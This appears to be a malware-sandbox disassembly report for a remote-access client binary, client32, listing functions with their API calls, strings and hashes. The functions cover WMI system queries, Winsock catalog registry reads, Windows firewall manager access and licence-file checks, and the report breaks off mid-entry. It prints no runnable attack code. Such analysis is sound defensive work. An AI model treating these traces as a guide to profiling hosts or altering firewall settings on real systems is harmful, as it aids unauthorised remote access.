Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
API String ID: 999355418-161875503
Opcode ID: c88c5497aaf0b71f7d616666734417a077c2241501ec168b0270ea83746a62af
Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
Opcode Fuzzy Hash: c88c5497aaf0b71f7d616666734417a077c2241501ec168b0270ea83746a62af
Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1

Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,0BAD89F8,00000000,?), ref: 1115C927
CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
wsprintfW.USER32 ref: 1115C967
SysAllocString.OLEAUT32(?), ref: 1115C973
wsprintfW.USER32 ref: 1115CA27
SysFreeString.OLEAUT32(?), ref: 1115CAC8

Strings

root\CIMV2, xrefs: 1115C961
SELECT * FROM %s, xrefs: 1115CA21
WQL, xrefs: 1115CA40

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
String ID: SELECT * FROM %s$WQL$root\CIMV2
API String ID: 3050498177-823534439
Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51

Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4

_memset.LIBCMT ref: 11146055
GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
FreeLibrary.KERNEL32(00000000), ref: 111460BF
GetSystemDefaultLangID.KERNEL32 ref: 111460CA

Strings

kernel32.dll, xrefs: 11146080
GetUserDefaultUILanguage, xrefs: 111460A1

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51

Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1101567A
_memset.LIBCMT ref: 110156BE
RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8

Strings

NSLSP, xrefs: 11015708
PackedCatalogItem, xrefs: 110156E2
%012d, xrefs: 11015674
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90

Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
std::_Lockit::_Lockit.LIBCPMT ref: 11010190
std::bad_exception::bad_exception.LIBCMT ref: 11010214
__CxxThrowException@8.LIBCMT ref: 11010222
std::_Lockit::_Lockit.LIBCPMT ref: 11010235
std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F

Strings

bad cast, xrefs: 1101020C

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91

Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

FALSE || !"wrong nsmdir", xrefs: 1114586E
nsmdir < GP_MAX, xrefs: 111457CC
..\ctl32\util.cpp, xrefs: 111457C7, 11145869

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: 24d87a64627cab5ad91252514022c9cb8009f58f212d92025f6c6eeea78916e9
Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
Opcode Fuzzy Hash: 24d87a64627cab5ad91252514022c9cb8009f58f212d92025f6c6eeea78916e9
Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91

Function 1102A6D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 101COMMON

Download Yara Rule

APIs

IsJPIK.PCICHEK(0BAD89F8,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Strings

_License, xrefs: 1102A778
iks.lic, xrefs: 1102A740
Serial_no, xrefs: 1102A773
IKS, xrefs: 1102A787
NSM.LIC, xrefs: 1102A6E4

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free_malloc_memsetwsprintf
String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
API String ID: 2814900446-469156069
Opcode ID: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
Opcode Fuzzy Hash: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791

Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 1101792C
CoInitialize.OLE32(00000000), ref: 11017935
_GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
CoUninitialize.COMBASE ref: 110179C0

Strings

Win32_ComputerSystem, xrefs: 1101794D
PCSystemTypeEx, xrefs: 1101796C

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2407233060-578995875
Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791

Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 11017842
CoInitialize.OLE32(00000000), ref: 1101784B
_GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
CoUninitialize.COMBASE ref: 110178D0

Strings

ChassisTypes, xrefs: 11017882
Win32_SystemEnclosure, xrefs: 11017863

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2407233060-2037925671
Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0

Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1113962A
GetTickCount.KERNEL32 ref: 11139631

Strings

AutoICFConfig, xrefs: 11139650
DoICFConfig() OK, xrefs: 111396D6
Client, xrefs: 11139655
DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
API String ID: 536389180-1512301160
Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46

Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11096DA4
CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9

Strings

HNetCfg.FwMgr, xrefs: 11096DB9
ICF Present: , xrefs: 11096E00

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFromInitializeInstanceProgUninitialize
String ID: HNetCfg.FwMgr$ICF Present:
API String ID: 3222248624-258972079
Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1

Function 110262F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359

Strings

GetProcessImageFileNameA, xrefs: 11026300
GetModuleFileNameExA, xrefs: 11026330

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

